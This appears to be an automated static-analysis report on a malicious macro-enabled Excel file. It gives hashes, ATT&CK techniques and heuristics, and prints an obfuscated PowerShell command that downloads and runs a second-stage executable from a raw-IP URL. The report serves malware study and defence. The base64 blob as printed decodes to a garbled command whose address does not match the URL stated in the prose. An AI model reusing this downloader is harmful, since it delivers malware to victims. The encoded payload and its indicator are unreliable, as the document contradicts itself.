Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 937288166a66dd3f…

MALICIOUS

Office (OOXML) / .XLSM

389.9 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 15.0300
MD5: 52c6dca94c94256ad0f980ff6b29266d SHA-1: d8adb20168c3a695d80d3931e4ff3557f07205e2 SHA-256: 937288166a66dd3f6825c788ff584d98646bfe089ae5c30af162bcdae3cdb788
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

This XLSM file contains VBA macros that are designed to bypass Office security warnings by instructing the user to enable content. Upon activation, the macro executes a PowerShell command. This command is obfuscated but reconstructs to: 'powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBPAHYAagBuAHcAYgB0AGFHEAB4AG8AdABzAGEAbAB4AHYAagBnAGYALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0AdAB5AC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA4AC4AMQA5ADUANQAuADMAeAAzAC4AMQA4ADMALwA4AC8AOAAvADEAMAA1ADkANAAwADAAMAAxADMANgAuAGUAeABlACIAKAAiACQAZQBuAHYAOgBBAFAAVABBAFQAQQBcACQAUgBvAGMAQQBtAGUAIgApADsAUwB0AGEAcgB0AC0AQQByAG8AYwBlAHoAIABKACIA This PowerShell command downloads and executes a second-stage payload from the URL http://18.195.143.138/8/8/1059400136.exe. The use of a macro-enabled document and a PowerShell downloader indicates a common malware delivery pattern.

Heuristics 5

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • External hyperlinks (6) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 6 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844736
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://go.microsoft.com/fwlink/?linkid=844736
    • http://go.microsoft.com/fwlink/?LinkId=844969
    • https://go.microsoft.com/fwlink/?linkid=844749
    • https://go.microsoft.com/fwlink/?linkid=844741
    • https://go.microsoft.com/fwlink/?linkid=844732
    • https://go.microsoft.com/fwlink/?linkid=844725
    • https://go.microsoft.com/fwlink/?linkid=844742
    • https://go.microsoft.com/fwlink/?linkid=844734
    • https://go.microsoft.com/fwlink/?linkid=844751
    • https://go.microsoft.com/fwlink/?linkid=844745
    • https://go.microsoft.com/fwlink/?linkid=844743
    • https://go.microsoft.com/fwlink/?linkid=844728
    • https://go.microsoft.com/fwlink/?linkid=844746
    • https://go.microsoft.com/fwlink/?linkid=844747
    • https://go.microsoft.com/fwlink/?linkid=844726
    • https://go.microsoft.com/fwlink/?linkid=844738
    • https://go.microsoft.com/fwlink/?linkid=844735
    • https://go.microsoft.com/fwlink/?linkid=844750
    • http://go.microsoft.com/fwlink/?LinkId=846285

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
c9159d7100219f6c9f2094c2709d51d94d3251bb9be25953bd6b296d4b4a32e9		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6166 bytes
vbaProject_00.bin
497e61d23d55d38c09150bc81d2b4788775e051fcb72f46737b999d7d3ec3668		 vba-project OOXML VBA project: xl/vbaProject.bin 10752 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.